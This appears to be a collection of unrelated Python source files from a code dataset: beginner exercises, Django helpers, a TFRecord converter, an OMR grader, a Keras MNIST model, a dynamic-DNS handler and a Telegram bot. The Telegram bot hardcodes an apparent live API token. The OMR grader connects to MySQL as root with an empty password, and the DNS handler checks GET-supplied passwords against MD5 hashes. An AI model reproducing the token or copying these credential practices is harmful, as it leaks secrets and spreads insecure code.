powtórzy \n\t\tprint(\"Liczba nie jest naturalna\")\n\t\tn = int(input(\"Podaj liczbę naturalną \"))\n\tm = int(input(\"Podaj kolejną liczbę naturalną \")) \t #Program pobiera cyfrę m\n\twhile m < n: #Sprawdza czy jest ona naturalna jeżeli nie powiadami o tym i powtórzy\n\t\tprint(\"Liczba nie jest naturalna\") \n\t\tm = int(input(\"Podaj liczbę naturalną \"))\n\t\n\t\n\t\n\t\n\t\n\t\n\tfor i in range(n, m + 1): # Funckcja pobiera zmienne n i m ustawia je jako pierwszą i drugą cyfrę zbioru i wyposuje je \n\t\n\t\tprint (i,\" \", end =\" \")\n\t\n\t\n\t\n \n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","sub_path":"Praca/1/cw2.py","file_name":"cw2.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"236268","text":"\"\"\"\n7.\tВ одномерном массиве целых чисел определить два наименьших элемента.\nОни могут быть как равны между собой (оба являться минимальными),\n так и различаться.\n\"\"\"\n\nfrom random import random\n\nN = 10\narr = [0] * N\nfor i in range(N):\n arr[i] = int(random() * 10)\n\nif arr[0] < arr[1]:\n min_1 = arr[0]\n min_2 = arr[1]\nelse:\n min_1 = arr[1]\n min_2 = 
arr[0]\nfor i in range(2, len(arr)):\n if arr[i] <= min_1:\n min_2 = min_1\n min_1 = arr[i]\n elif arr[i] < min_2:\n min_2 = arr[i]\nprint(arr)\nif min_1 == min_2:\n print(f'оба минимальных числа имеют значение: {min_1}')\nelse:\n print(f'Первое минимальное число = {min_1}, второе минимальное число = {min_2}')","sub_path":"Lesson_3/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"186550752","text":"import json, urllib2, re\nfrom cep.models import Endereco\nfrom restless.exceptions import NotFound\n\nclass EnderecoHelper:\n @staticmethod\n def keyExists(list, key, default):\n try:\n return list[key]\n except:\n return default\n\n @staticmethod\n def onlyNumbers(value):\n non_numeric = re.compile(r'[^\\d]+')\n return non_numeric.sub('', value)\n\n @staticmethod\n def get_data_from_postmon(zipcode):\n URL_CONSULTA = \"http://api.postmon.com.br/v1/cep/%s\" % zipcode\n jsonContent = urllib2.urlopen(URL_CONSULTA)\n if (jsonContent.getcode() == 404):\n raise NotFound('CEP NAO ENCONTRADO')\n\n return json.load(jsonContent)\n\n @staticmethod\n def create_endereco_from_postmon(jsonObject):\n return Endereco.objects.create(\n zipcode = EnderecoHelper.keyExists(jsonObject, \"cep\", \"\"),\n city = EnderecoHelper.keyExists(jsonObject, \"cidade\", \"\"),\n address = EnderecoHelper.keyExists(jsonObject, \"logradouro\", \"\"),\n neighborhood = EnderecoHelper.keyExists(jsonObject, \"bairro\", \"\"),\n state = EnderecoHelper.keyExists(jsonObject, \"estado\", \"\"),\n )\n\n @staticmethod\n def create_or_get_from_zipcode(zipcode):\n try:\n jsonObj = EnderecoHelper.get_data_from_postmon(zipcode)\n except:\n raise\n\n try:\n return Endereco.objects.get(zipcode=jsonObj[\"cep\"])\n except:\n return EnderecoHelper.create_endereco_from_postmon(jsonObj)\n\n @staticmethod\n def get_zipcode_or_404(zipcode):\n try:\n return Endereco.objects.get(zipcode=zipcode)\n except:\n raise NotFound('CEP NAO ENCONTRADO')\n","sub_path":"cep/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"14959631","text":"#!/usr/bin/env python3\n\nimport collections\n\nfrom ml.rl.preprocessing.normalization import NormalizationParameters\n\n\ndef default_normalizer(feats, min_value=None, max_value=None):\n normalization = collections.OrderedDict(\n [\n (\n feats[i],\n NormalizationParameters(\n feature_type=\"CONTINUOUS\",\n boxcox_lambda=None,\n boxcox_shift=0,\n mean=0,\n stddev=1,\n possible_values=None,\n quantiles=None,\n min_value=min_value,\n max_value=max_value,\n ),\n )\n for i in range(len(feats))\n ]\n )\n return normalization\n","sub_path":"ml/rl/test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"235591664","text":"# Copyright 2017 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nr\"\"\"Convert raw PASCAL dataset to TFRecord for object_detection.\nExample usage:\n ./create_pascal_tf_record --data_dir=/home/user/VOCdevkit \\\n --year=VOC2012 \\\n --output_path=/home/user/pascal.record\n\"\"\"\n\n# Slightly modified from the original version\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport hashlib\nimport io\nimport logging\nimport os\nimport re\nimport numpy as np\n\nfrom lxml import etree\nimport PIL.Image\nimport tensorflow as tf\n\nfrom utils import dataset_util\n\n\nflags = tf.app.flags\nflags.DEFINE_string('data_dir', '', 'Root directory to raw UECFOOD256 dataset.')\nflags.DEFINE_string('set', 'train', 'Convert training set, validation set or '\n 'merged set.')\nflags.DEFINE_string('images_dir', 'Images',\n '(Relative) path to images directory.')\nflags.DEFINE_string('annotations_dir', 'Annotations',\n '(Relative) path to annotations directory.')\nflags.DEFINE_string('output_path', '', 'Path to output TFRecord')\nflags.DEFINE_string('categories_path', 'data/categories.txt',\n 'Path to the list of categories')\nflags.DEFINE_boolean('ignore_difficult_instances', False, 'Whether to ignore '\n 'difficult instances')\nFLAGS = flags.FLAGS\n\nSETS = ['train', 'val', 'trainval', 'test']\n\n\ndef dict_to_tf_example(data,\n dataset_directory,\n categories,\n ignore_difficult_instances=False,\n image_subdirectory='Images'):\n \"\"\"Convert XML derived dict to tf.Example proto.\n Notice that this function normalizes the bounding box coordinates provided\n by the raw data.\n Args:\n data: dict holding PASCAL XML fields for a single image (obtained by\n running dataset_util.recursive_parse_xml_to_dict)\n dataset_directory: Path to root directory holding PASCAL dataset\n label_map_dict: A map from string label names to integers ids.\n ignore_difficult_instances: Whether to skip difficult instances in the\n dataset (default: False).\n image_subdirectory: String specifying subdirectory within the\n PASCAL dataset directory holding the actual image data.\n Returns:\n example: The converted tf.Example.\n Raises:\n ValueError: if the image pointed to by data['filename'] is not a valid JPEG\n \"\"\"\n img_path = os.path.join(data['data_dir'], data['filename'])\n full_path = os.path.join(dataset_directory, img_path)\n with tf.gfile.GFile(full_path, 'rb') as fid:\n encoded_jpg = fid.read()\n encoded_jpg_io = io.BytesIO(encoded_jpg)\n image = PIL.Image.open(encoded_jpg_io)\n if image.format != 'JPEG':\n raise ValueError('Image format not JPEG')\n key = hashlib.sha256(encoded_jpg).hexdigest()\n\n # Image characteristics\n width, height = PIL.Image.open(img_path).size\n\n xmin = []\n ymin = []\n xmax = []\n ymax = []\n classes = []\n classes_text = []\n for ix, obj in enumerate(data['boxes']):\n xmin.append(np.clip(float(obj[0]) / width, 0, 1))\n 
ymin.append(np.clip(float(obj[1]) / height, 0, 1))\n xmax.append(np.clip(float(obj[2]) / width, 0, 1))\n ymax.append(np.clip(float(obj[3]) / height, 0, 1))\n classes_text.append(categories[int(data['labels'][ix])-1])\n classes.append(int(data['labels'][ix]))\n\n example = tf.train.Example(features=tf.train.Features(feature={\n 'image/height': dataset_util.int64_feature(height),\n 'image/width': dataset_util.int64_feature(width),\n 'image/filename': dataset_util.bytes_feature(\n data['filename'].encode('utf8')),\n 'image/source_id': dataset_util.bytes_feature(\n data['filename'].encode('utf8')),\n 'image/key/sha256': dataset_util.bytes_feature(key.encode('utf8')),\n 'image/encoded': dataset_util.bytes_feature(encoded_jpg),\n 'image/format': dataset_util.bytes_feature('jpeg'.encode('utf8')),\n 'image/object/bbox/xmin': dataset_util.float_list_feature(xmin),\n 'image/object/bbox/xmax': dataset_util.float_list_feature(xmax),\n 'image/object/bbox/ymin': dataset_util.float_list_feature(ymin),\n 'image/object/bbox/ymax': dataset_util.float_list_feature(ymax),\n 'image/object/class/text': dataset_util.bytes_list_feature(classes_text),\n 'image/object/class/label': dataset_util.int64_list_feature(classes),\n }))\n return example\n\n\ndef main(_):\n if FLAGS.set not in SETS:\n raise ValueError('set must be in : {}'.format(SETS))\n \n data_dir = FLAGS.data_dir\n\n writer = tf.python_io.TFRecordWriter(FLAGS.output_path)\n\n categories = [line.rstrip('\\n') for line in open(FLAGS.categories_path)]\n\n logging.info('Reading from UECFOOD256 dataset.')\n list_set_path = os.path.join(data_dir, 'ImageSets', FLAGS.set + '.txt')\n images_dir = os.path.join(data_dir, FLAGS.images_dir)\n annotations_dir = os.path.join(data_dir, FLAGS.annotations_dir)\n list_set = dataset_util.read_examples_list(list_set_path)\n for idx, example in enumerate(list_set):\n if idx % 100 == 0:\n logging.info('On image %d of %d', idx, len(list_set))\n\n # Annotation characteristics\n ann_path = os.path.join(annotations_dir, example + '.txt')\n\n # Read annots\n data = [line.rstrip('\\n').split() for line in open(ann_path)]\n bboxes = []\n labels = []\n for obj in data:\n labels.append(float(obj[0]))\n bboxes.append([float(obj[1]), float(obj[2]), \n float(obj[3]), float(obj[4])])\n\n data = {\n 'data_dir': images_dir, \n 'filename': example + '.jpg', \n 'boxes': bboxes, \n 'labels': labels, \n }\n\n tf_example = dict_to_tf_example(data, FLAGS.data_dir, categories,\n FLAGS.ignore_difficult_instances)\n writer.write(tf_example.SerializeToString())\n\n writer.close()\n\n\nif __name__ == '__main__':\n tf.app.run()\n\n","sub_path":"builders/UECFOOD256/create_tf_records.py","file_name":"create_tf_records.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"161459090","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 13 22:34:35 2020\n\n@author: ASUS\n\"\"\"\n\nfrom imutils.perspective import four_point_transform\nfrom imutils import contours\nimport numpy as np\nfrom numpy import array\nimport argparse as ap\nimport imutils as imtl\nimport cv2 as cv\nimport dewapper\nimport generate_answer\nimport generate_roll\n##############################################################################\nimg = cv.imread('images/pic36.jpg')\nwarpe = dewapper.dewarp_book(img)\n\nroll=generate_roll.get_roll(warpe)\nprint(roll)\n#answer=generate_answer.get_answer(warpe)\nanswer=[1, 2, 1, 2, 0, 1, 2, 1, 1, 3, 2, 2, 0, 1, 1, 1, 3, 0, 0, 1, 2, 1, 2, 3, 3, 
1, 0, 2, 1, 3, 0, 3, 0, 2, 1]\n#answer = array(answer)\nprint(answer)\n\nimg = cv.imread('images/pic36.jpg')\nwarped = dewapper.dewarp_book(img)\n\ngray=cv.cvtColor(warped,cv.COLOR_BGR2GRAY)\nblurred=cv.GaussianBlur(gray,(5,5),0)\nedged=cv.Canny(blurred,75,200)\n# Declaring the array of answers // index = question number // Value = answer number ( 0=A , 1=B , 2=C , 3=D ) \n\n\n# Total question number\nbblcnt=35\n#\n# For checking the total processed answer.\nbblchkcnt=0\n#\n##############################################################################\n\n\n\n##############################################################################\nret, thresh = cv.threshold(gray, 127, 255, 0)\ncntr, hierarchy = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n#cnt=cv.drawContours(warped, cntr, -1, (0,255,0), 2)\n\n#The outer box of the qustions//Pretended to be 2 box in the OMR sheet\nboxcnts = []\n#\nfor c in cntr:\n (x , y , w , h) = cv.boundingRect(c)\n ar = w/float(h)\n if w>=800 and h>=3500 and ar>=0.20 and ar<=0.30:\n boxcnts.append(c)\n#print(len(boxcnts))\n\ncnt=cv.drawContours(warped, boxcnts, -1, (0,255,0), 20)\ncv.namedWindow('bubble outer box image', cv.WINDOW_NORMAL) \ncv.resizeWindow('bubble outer box image', 1080, 720) \ncv.imshow(\"bubble outer box image\", cnt )\n#cv.imshow(\"warped image\", boximg[0] )\ncv.waitKey(0)\ncv.destroyAllWindows()\n\nboxcnts = contours.sort_contours(boxcnts)[0]\n##############################################################################\n\n\n\n##############################################################################\n# for storing the box images from contours\nboximg=[]\n\nfor c in boxcnts:\n (x , y , w , h) = cv.boundingRect(c)\n boxcnt=warped[y:y+h,x:x+w]\n boximg.append(boxcnt)\ncorrect=0\ncoun=0\nfor d in range(len(boximg)):\n #print(d)\n gray=cv.cvtColor(boximg[d],cv.COLOR_BGR2GRAY)\n thresh = cv.threshold(gray, 0, 255, cv.THRESH_BINARY_INV | cv.THRESH_OTSU)[1]\n cnts,hierarchy = cv.findContours(thresh.copy(),cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE)\n \n #cnt=cv.drawContours(warped, boxcnts, -1, (0,255,0), 2)\n cv.namedWindow('bubble outer box thresh', cv.WINDOW_NORMAL) \n cv.resizeWindow('bubble outer box thresh', 1080, 720) \n cv.imshow(\"bubble outer box thresh\", thresh )\n #cv.imshow(\"warped image\", boximg[0] )\n cv.waitKey(0)\n cv.destroyAllWindows()\n\n bubbles=[]\n for c in cnts:\n (x , y , w , h) = cv.boundingRect(c)\n ar = w/float(h)\n if w>=105 and w<=130 and h>=105 and h<=130 and ar>=0.9 and ar<=1.2:\n bubbles.append(c)\n cnt=cv.drawContours(boximg[d],bubbles, -1, (0,255,0), 3)\n #print(len(bubbles))\n #qncn=len(bubbles)/4\n\n\n bubbles = contours.sort_contours(bubbles,method=\"top-to-bottom\")[0]\n for (q,i) in enumerate(np.arange(0 , len(bubbles), 4),coun):\n cnts = contours.sort_contours(bubbles[i:i+4])[0]\n bubbled = None\n for (j , c) in enumerate(cnts):\n mask = np.zeros(thresh.shape, dtype=\"uint8\")\n cv.drawContours(mask , [c] , -1, 255, -1)\n mask = cv.bitwise_and(thresh , thresh , mask= mask) \n '''cv.namedWindow('mask of each bubble', cv.WINDOW_NORMAL) \n cv.resizeWindow('mask of each bubble', 1080, 720) \n #cv.imshow(\"warped image\", warped )\n cv.imshow(\"mask of each bubble\",mask)\n cv.waitKey(0)\n cv.destroyAllWindows()'''\n total = cv.countNonZero(mask)\n #print(total)\n if bubbled is None or total > bubbled[0]:\n bubbled = (total , j)\n color = (0, 0, 255)\n #ansq = coun+q\n #print(q)\n if(q>34):\n break\n k = answer[q]\n if(k==bubbled[1]):\n color = (0,240,0)\n correct += 1\n 
cv.drawContours(boximg[d], [cnts[k]], -1, color, 20)\n coun=25\n\nprint(correct)\n\nscore = correct\nprint(\"[INFO] score: {:.2f}\".format(score))\ncv.putText(warped, \"{:.2f}\".format(score), (2887, 3826),\n\tcv.FONT_HERSHEY_SIMPLEX, 5, (255, 0,0 ), 20)\ncv.putText(warped, \"{:.0f}\".format(int(roll)), (2898, 1005),\n\tcv.FONT_HERSHEY_SIMPLEX, 5, (255, 0,0 ), 20)\n\nroll=1604092\ncorrect = 25\nimport mysql.connector\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"\",\n database=\"omr\"\n)\nmycursor = mydb.cursor()\n\nsql = \"INSERT INTO Marks (roll, mark) VALUES (%s,%s)\"\nval=(int(roll),int(correct))\n\nmycursor.execute(sql,val)\n\nmydb.commit()\n\ncv.namedWindow('warped image', cv.WINDOW_NORMAL) \ncv.resizeWindow('warped image', 1080, 720) \ncv.imshow(\"warped image\", warped )\n#cv.imshow(\"warped image\", boximg[0] )\ncv.waitKey(0)\ncv.destroyAllWindows()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"307470225","text":"\"\"\"\nApprove or lock objects from the database\n\"\"\"\nimport logging\n\nfrom dateutil.relativedelta import relativedelta\n\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom results.models.competitions import Competition\nfrom results.models.events import Event\nfrom results.models.records import Record\nfrom results.models.results import Result\n\nlogger = logging.getLogger(__name__)\n\n\ndef _check_requirements(result):\n competition = result.competition\n if result.athlete:\n athletes = [result.athlete]\n else:\n athletes = result.team_members.all()\n for requirement in competition.type.requirements.split(',') + competition.level.requirements.split(','):\n if requirement.strip():\n for athlete in athletes:\n if not athlete.organization.external and not athlete.info.filter(\n type=requirement.strip(),\n date_start__lte=competition.date_start,\n date_end__gte=competition.date_start).count():\n return False\n return True\n\n\nclass Command(BaseCommand):\n list_only = False\n check_requirements = False\n verbosity = 0\n\n def add_arguments(self, parser):\n parser.add_argument('-d', type=int, action='store', dest='days',\n help='Date limit for approval or locking, default 30.')\n parser.add_argument('--result', action='store_true', dest='approve_results',\n help='Approve results which have not been modified during date limit')\n parser.add_argument('--record', action='store_true', dest='approve_records',\n help='Approve records which have not been modified during date limit')\n parser.add_argument('--event', action='store_true', dest='lock_events',\n help='Lock past events which have not been modified during date limit')\n parser.add_argument('--competition', action='store_true', dest='lock_competitions',\n help='Lock past competitions which have not been modified during date limit')\n parser.add_argument('-r', action='store_true', dest='check_requirements',\n help='Check competition type and level requirements for result approval')\n parser.add_argument('-l', action='store_true', dest='list_only',\n help='List only, do not approve')\n\n def output(self, text):\n if self.list_only:\n self.stdout.write(\"(List only) \" + text)\n else:\n if self.verbosity:\n self.stdout.write(text)\n logger.info(text)\n\n def approve_results(self, date_limit):\n \"\"\" Approve results which have not been modified during date limits\"\"\"\n for result in 
Result.objects.filter(updated_at__lt=date_limit, approved=False):\n if _check_requirements(result):\n result.approved = True\n self.output(\"Result approved: %s\" % result)\n if not self.list_only:\n result.save()\n else:\n self.output(\"Requirements not met: %s\" % result)\n\n def approve_records(self, date_limit):\n \"\"\" Approve records which have not been modified during date limits\"\"\"\n for record in Record.objects.filter(updated_at__lt=date_limit, approved=False):\n record.approved = True\n self.output(\"Record approved: %s\" % record)\n if not self.list_only:\n record.save()\n\n def lock_competitions(self, date_limit):\n \"\"\"Lock past competitions which have not been modified during date limit\"\"\"\n for competition in Competition.objects.filter(date_end__lte=date_limit,\n updated_at__lt=date_limit,\n locked=False):\n if Result.objects.filter(\n competition=competition, updated_at__lt=date_limit).exclude(approved=True).count() == 0:\n competition.locked = True\n self.output(\"Competition locked: %s\" % competition)\n if not self.list_only:\n competition.save()\n\n def lock_events(self, date_limit):\n \"\"\"Lock past events which have not been modified during date limit\"\"\"\n for event in Event.objects.filter(date_end__lte=date_limit,\n updated_at__lt=date_limit,\n locked=False):\n if Competition.objects.filter(event=event, updated_at__lt=date_limit).exclude(locked=True).count() == 0:\n event.locked = True\n self.output(\"Event locked: %s\" % event)\n if not self.list_only:\n event.save()\n\n def handle(self, *args, **options):\n days = options['days']\n approve_results = options['approve_results']\n approve_records = options['approve_records']\n lock_competitions = options['lock_competitions']\n lock_events = options['lock_events']\n self.verbosity = options['verbosity']\n self.list_only = options['list_only']\n # Set date range to one year if not given\n if days is None:\n days = 30\n if days >= 0:\n date_limit = timezone.now() - relativedelta(days=days)\n if approve_results:\n self.approve_results(date_limit)\n if approve_records:\n self.approve_records(date_limit)\n if lock_competitions:\n self.lock_competitions(date_limit)\n if lock_events:\n self.lock_events(date_limit)\n else:\n self.stderr.write(\"Error: -d must be positive\")","sub_path":"results/management/commands/approve.py","file_name":"approve.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"519812852","text":"\"\"\"verify_hue_running.py: Script for Hue initialization action test.\n\"\"\"\n\n# This file was provided by Google.\n# Added feature to pass expected_version as it's different on 1.0 1.1 and 1.2\n\nimport requests\nimport socket\n\nBASE = 'localhost'\nPORT = 8888\n\n\n\nclass HueApi(object):\n def __init__(self, base, port):\n self.base = 'http://{}:{}'.format(base, port)\n self.host = socket.gethostname()\n\n def get_homepage(self):\n path = '/accounts/login/?next=/'\n try:\n r = requests.get(self.base + path)\n if r.status_code < 300:\n print(\"OK - Hue UI is running on master node\")\n else:\n raise Exception('NOK - Could not find service UI running')\n except requests.exceptions.RequestException:\n if '-w-' in self.host:\n print(\"OK - Hue is not running on worker node\")\n else:\n print(\"CONNECTION ERROR\")\n\ndef main():\n \"\"\"Drives the script.\n\n Returns:\n None\n\n Raises:\n Exception: If a response does not contain the expected value\n \"\"\"\n hueApi = HueApi(BASE,PORT)\n res = 
hueApi.get_homepage()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"testing-scripts/hue/verify_hue_running.py","file_name":"verify_hue_running.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"99038174","text":"#!/usr/bin/python\n#-*- coding:utf8 -*-\n# Desgin By Xiaok\nfrom xk_application.xk_main import *\n\nclass DynHandler(BaseHandler):\n def get(self,*args):\n #print args # 传入了一个login的参数进来了\n self.post(self,*args);\n\n def post(self,*args):\n username = self.get_argument('username')\n password = self.get_argument('password')\n \n domain = self.get_argument('domain')\n record = self.get_argument('record')\n typename = self.get_argument('typename')\n\n user = self.db.get('''select id,username,status from xk_users where username = %s and password = md5(%s)''',username,password)\n if user:\n if user['status'] == 'no':\n self.write('''用户已禁用, 请联系管理员!''')\n return\n else:\n self.write('''用户名或密码错误!''')\n return\n # 获取客户端信息,并写入登录日志\n headers = self.request.headers\n login_host = self.request.remote_ip\n #login_host = \"210.75.225.254\" # For Test and Debug\n user_agent = headers.get('User-Agent')\n # 写登录日志\n self.db.execute(''' insert into xk_login_logs (uid,username,login_host,user_agent) values (%s,%s,%s,%s) ''',user['id'],user['username'],login_host,user_agent)\n \n #domain is exit\n _domain = self.db.get(\"select id,domain from xk_domain where status = 'yes' and domain = %s\", domain)\n if _domain:\n _record = self.db.get(\"select id,value,did from xk_record where record = %s and type = %s and did=%s\", record,typename,_domain['id'])\n if _record:\n #record exist,check ip,if change, then update and restrat dns server\n if _record['value'] == login_host:\n \n return\n else:\n self.db.execute(''' update xk_record set value=%s where id=%s and did=%s ''',login_host,_record['id'],_domain['id'])\n self.redirect(\"/public/api?module=dnsmasq&fun=update&id=\"+str(_record['did'])+\"&force=yes\")\n \n return\n \n else:\n #record not exist,insert and restart dns server\n did = _domain['id']\n record = self.get_argument(\"record\")\n type = self.get_argument(\"typename\")\n value = login_host\n priority = self.get_argument(\"priority\",0)\n comment = \"auto create dns\"\n \n if type == \"MX\":\n priority = int(priority)\n else:\n priority = None\n \n self.db.execute(\"insert into xk_record (did,record,type,value,priority,comment,create_time) values (%s,%s,%s,%s,%s,%s,%s)\",did,record,type,value,priority,comment,self.get_time())\n #self.write(\"1\")\n self.redirect(\"/public/api?module=dnsmasq&fun=update&id=\"+str(did)+\"&force=no\")\n return \n else:\n self.write(\"domain [\"+domain+\"] is not exist\")\n return\n \n \n \n","sub_path":"xk_handler/xk_dyn_dns.py","file_name":"xk_dyn_dns.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"449515260","text":"# Larger CNN for the MNIST Dataset\nimport numpy\n\nfrom matplotlib import pyplot\nfrom scipy.misc import toimage\nimport matplotlib.pyplot as plt\n\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import Flatten\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras import backend as K\nK.set_image_dim_ordering('th')\n\n# fix random seed for 
reproducibility\nseed = 7\nnumpy.random.seed(seed)\n\n# load data\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\n# reshape to be [samples][pixels][width][height]\nX_train = X_train.reshape(X_train.shape[0], 1, 28, 28).astype('float32')\nX_test = X_test.reshape(X_test.shape[0], 1, 28, 28).astype('float32')\n\n# normalize inputs from 0-255 to 0-1\nX_train = X_train / 255\nX_test = X_test / 255\n\n# one hot encode outputs\ny_train = np_utils.to_categorical(y_train)\ny_test = np_utils.to_categorical(y_test)\nnum_classes = y_test.shape[1]\n\n\n# define the larger model\ndef larger_model():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Conv2D(30, (5, 5), input_shape=(1, 28, 28), activation='relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\tmodel.add(Conv2D(15, (3, 3), activation='relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\tmodel.add(Dropout(0.2))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(128, activation='relu'))\n\tmodel.add(Dense(50, activation='relu'))\n\tmodel.add(Dense(num_classes, activation='softmax'))\n\t# Compile model\n\tmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\n\n\n\n# build the model\nmodel = larger_model()\n\n# Fit the model\nhistory = model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=2, batch_size=200)\n\n# list all history\nprint(history.history.keys())\n\nprint(history.history['acc'])\nprint(history.history['val_acc'])\n\n# Final evaluation of the model\nscores = model.evaluate(X_test, y_test, verbose=0)\nprint(\"Large CNN Error: %.2f%%\" % (100-scores[1]*100))\n\n\n\n\nif __name__ == '__main__':\n    \n    #imgs = load_and_scale_imgs()\n    #predictions = model.predict_classes(imgs)\n    #print(predictions)\n    \n\n    # summarize history for accuracy\n    plt.plot(history.history['val_acc'])\n    plt.plot(history.history['acc'])\n    plt.title('model accuracy')\n    plt.ylabel('accuracy')\n    plt.xlabel('epoch')\n    plt.legend(['train', 'test'], loc='upper left')\n    plt.show()\n\n    # summarize history for loss\n    plt.plot(history.history['val_loss'])\n    plt.plot(history.history['loss'])\n    plt.title('model loss')\n    plt.ylabel('loss')\n    plt.xlabel('epoch')\n    plt.legend(['train', 'test'], loc='upper left')\n    plt.show()\n","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"19045923","text":"def add(j):\n    A=[]\n    A=j\n    c=input('Which juice would you like to add?')\n    if c in j:\n        print('Already on the menu')\n    else:\n        A.append(c)\n        print('Added')\n    return A\n\ndef show(j):\n    b=[]\n    print(j)\n    b=j\n    return b\n\ndef remove(j):\n    e=[]\n    e=j\n    c=input('Which juice would you like to remove?')\n    if c in j:\n        e.remove(c)\n        print('Removed')\n    else:\n        print('No such juice')\n    return e\n\nj=[]\nw=[add,show,remove]\nwhile True:\n    print('1. Add a juice to the menu')\n    print('2. Show all current juices')\n    print('3. Remove a juice from the menu')\n    print('4. 
Exit the system')\n    a=int(input('Please select a function'))\n    if a==4:\n        break\n    else:\n        j=w[a-1](j)","sub_path":"20210727/class/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"147042131","text":"import sys\nfrom io import BytesIO\n\nimport telegram\nfrom flask import Flask, request, send_file\n\nfrom fsm import TocMachine\n\n\nAPI_TOKEN = '336600070:AAH3oZzwf9xHxF4nYHdv2BXj1Rv5Kw2xYA8'\nWEBHOOK_URL = 'https://b92ef005.ngrok.io/hook'\n\napp = Flask(__name__)\nbot = telegram.Bot(token=API_TOKEN)\nmachine = TocMachine(\n    states=[\n        'init',\n        'user',\n        'talk',\n        'sorry',\n        'suck',\n        'play',\n        'east',\n        'animal',\n        'animalDetail',\n        'west',\n        'astro',\n        'astroDetail',\n        'math',\n        'matheq',\n        'mathneq'\n    ],\n    transitions=[\n        {\n            'trigger': 'advance',\n            'source': 'init',\n            'dest': 'user'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'user',\n            'dest': 'talk',\n            'conditions': 'is_going_to_talk'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'talk',\n            'dest': 'sorry',\n            'conditions': 'is_going_to_sorry'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'talk',\n            'dest': 'suck',\n            'conditions': 'is_going_to_suck'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'user',\n            'dest': 'play',\n            'conditions': 'is_going_to_play'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'play',\n            'dest': 'west',\n            'conditions': 'is_going_to_west'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'west',\n            'dest': 'astro',\n            'conditions': 'is_going_to_astro'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'astro',\n            'dest': 'astroDetail',\n            'conditions': 'is_going_to_astroDetail'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'play',\n            'dest': 'east',\n            'conditions': 'is_going_to_east'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'east',\n            'dest': 'animal',\n            'conditions': 'is_going_to_animal'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'animal',\n            'dest': 'animalDetail',\n            'conditions': 'is_going_to_animalDetail'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'animalDetail',\n            'dest': 'animalDetail',\n            'conditions': 'is_going_to_animalDetail'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'animalDetail',\n            'dest': 'user',\n            'conditions': 'is_going_out_animalDetail'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'user',\n            'dest': 'math',\n            'conditions': 'is_going_to_math'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'math',\n            'dest': 'matheq',\n            'conditions': 'is_going_to_matheq'\n        },\n        {\n            'trigger': 'advance',\n            'source': 'math',\n            'dest': 'mathneq',\n          